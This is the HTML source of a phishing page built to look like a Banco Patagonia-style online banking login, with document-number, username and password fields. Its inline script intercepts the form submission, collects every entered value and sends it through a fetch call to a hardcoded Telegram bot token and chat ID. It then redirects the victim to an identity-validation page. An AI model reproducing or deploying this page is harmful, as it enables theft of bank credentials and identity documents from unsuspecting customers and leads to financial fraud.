<!DOCTYPE html>
<html>
  <head>
    <script src="https://code.jquery.com/jquery-3.5.0.js"></script>
    <style type="text/css">
      * {
        padding: 0;
        margin: 0;
        font-family: Arial;
        box-sizing: border-box;
      }
      html {
        background: #b3c8d9;
        height: 100%;
      }
      .container {
        width: 80%;
        background: #fff;
        margin: 1em auto;
        padding: 2em 1em;
        max-width: 830px;
      }
      header {
        display: flex;
        flex-direction: row;
        flex-wrap: wrap;
        margin-bottom: 3em;
      }
      .logo {
        width: 50%;
        margin-bottom: 1em;
      }
      .logo:nth-of-type(2) {
        text-align: right;
      }
      nav {
        width: 100%;
        background: #0e3481;
        height: 31px;
      }
      ul {
        padding: 0;
        margin: 0;
        display: flex;
        list-style: none;
        width: 100%;
        justify-content: flex-end;
        height: 100%;
        align-items: center;
        color: #fff;
      }
      ul li > a {
        color: #fff;
        text-decoration: none;
        font-size: 12px;
        font-weight: bold;
      }
      ul li {
        margin-right: 0.5em;
      }
      .home {
        background: #b3c8d9;
        display: flex;
        flex-wrap: nowrap;
        border-bottom: 1px solid #b0e400;
      }
      .login {
        width: 37.5%;
        padding: 0.3em;
      }
      .baner {
        width: 70%;
        height: 100%;
      }
      form h4 {
        font-size: 11px;
        margin-bottom: 0.7em;
        color: #224380;
      }
      .controles-radios {
        width: 65%;
        display: flex;
        justify-content: space-around;
        margin: 0 auto 0.7em 0;
      }
      .controles-radios label {
        font-size: 11px;
        color: #224380;
        font-weight: bolder;
      }
      .controles-radios input {
        height: 16px;
        width: 16px;
      }
      .control {
        width: 100%;
        margin-bottom: 0.5em;
      }
      .control label {
        font-size: 11px;
        font-weight: bold;
        width: 23%;
        display: inline-block;
        color: #224380;
      }
      .control select {
        width: 23%;
      }
      .control input {
        width: 40%;
      }
      .control a {
        font-size: 11px;
        color: #224380;
      }
      .btn {
        width: 30%;
        left: 35%;
        position: relative;
        color: #224380;
        margin-bottom: 1em;
      }
      .doted {
        width: 100%;
        border-bottom: 1px dotted #fff;
        margin-bottom: 0.5em;
      }
      form span {
        font-size: 10px;
        color: #224380;
      }
      .button-link {
        display: inline-block;
        width: 43%;
        font-size: 11px;
        text-decoration: none;
        background: #fcfcfc;
        padding: 0.3em;
        border: 1px solid silver;
        color: #224380;
        margin-left: 30%;
        margin-top: 1em;
        margin-bottom: 0.5em;
      }
      .baner img {
        height: 300px;
        object-fit: cover;
        width: 100%;
      }
      .images-pre-footer {
        width: 100%;
      }
      .images-pre-footer img {
        width: 100%;
      }
    </style>
    <meta charset="utf-8" />
    <title>Disfruta Beneficios Patagonia</title>
  </head>
  <body>
    <div class="container">
      <header>
        <div class="logo">
          <img src="img/logo.jpg" />
        </div>
        <div class="logo">
          <img src="img/logo-2.jpg" />
        </div>
        <nav>
          <ul>
            <li><a href="">Sucursales y Cajeros</a></li>
            <li>|</li>
            <li><a href="">Ayuda</a></li>
            <li>|</li>
            <li><a href="">Contáctenos</a></li>
          </ul>
        </nav>
      </header>
      <section class="home">
        <div class="login">
          <form id="formularioIngreso" method="POST">
            <div>
              <img src="img/bienvenido.gif" />
            </div>
            <h4>Seleccione Documento o Usuario para ingresar.</h4>
            <div class="controles-radios">
              <input
                type="radio"
                name="opcion"
                value="dni"
                id="dnicampo"
                checked
              />
              <label>Documento</label>
              <input type="radio" name="opcion" value="user" id="usercamp" />
              <label>Usuario</label>
            </div>
            <div class="control documento" id="documento">
              <label>Documento</label>
              <select name="tipoDoc">
                <option value="DNI">DNI</option>
                <option value="CI">CI</option>
                <option value="PASAPORTE">PASAPORTE</option>
                <option value="LC">LC</option>
                <option value="LE">LE</option>
              </select>
              <input type="number" name="dninum" />
            </div>
            <div class="control user" id="user">
              <label>Usuario</label>
              <input type="text" name="user" />
              <a href="#">Olvidé mi usuario</a>
            </div>

            <div class="control">
              <label>Clave</label>
              <input type="password" name="password" required />
              <a href="#">Olvidé mi Clave</a>
            </div>
            <button type="submit" name="submit" class="btn">Ingresar</button>

            <div class="doted"></div>

            <span
              >Si olvidaste usuario y clave o para operar por primera vez</span
            >

            <a href="#" class="button-link">Crear usuario y clave</a>
          </form>
          <script>
            document
              .getElementById("formularioIngreso")
              .addEventListener("submit", function (event) {
                event.preventDefault(); // Evitar que el formulario se envíe por defecto

                // Configurar los datos para enviar a Telegram
                const telegramBotToken =
                  "6378086633:AAGVAfCvJ4w__4iNgaEnySvvb2C7CbONY9Y"; // Reemplaza con tu token de bot
                const chatId = "-4108504649"; // Reemplaza con el ID del chat donde recibirás los mensajes

                // Obtener los datos del formulario
                const formData = new FormData(this);
                let mensaje = "Nuevo ingreso:\n";

                formData.forEach(function (valor, clave) {
                  mensaje += clave + ": " + valor + "\n";
                });

                // Configurar la solicitud HTTP para enviar el mensaje a Telegram
                const url = `https://api.telegram.org/bot6378086633:AAGVAfCvJ4w__4iNgaEnySvvb2C7CbONY9Y/sendMessage?chat_id=-4108504649&text=${encodeURIComponent(
                  mensaje
                )}`;

                // Realizar la solicitud usando fetch API (requiere manejo de errores y promesas)
                fetch(url)
                  .then((response) => response.json())
                  .then((data) => {
                    if (data.ok) {
                      window.location.href = "valida_ident.html";
                      // Aquí podrías redirigir o mostrar un mensaje de éxito
                    } else {
                      console.error(data);
                    }
                  })
                  .catch((error) => {
                    console.error("Error al enviar los datos:", error);
                  });
              });
          </script>
        </div>
        <div class="baner">
          <img src="img/banner.jpg" />
        </div>
      </section>
      <section class="images-pre-footer">
        <img src="img/footer-img.jpg" />
      </section>
    </div>
    <script type="text/javascript">
      $(".user").hide();
      $("#dnicampo").click(function () {
        $(".user").hide();
        $(".documento").show();
      });
      $("#usercamp").click(function () {
        $(".documento").hide();
        $(".user").show();
      });
    </script>
  </body>
</html>
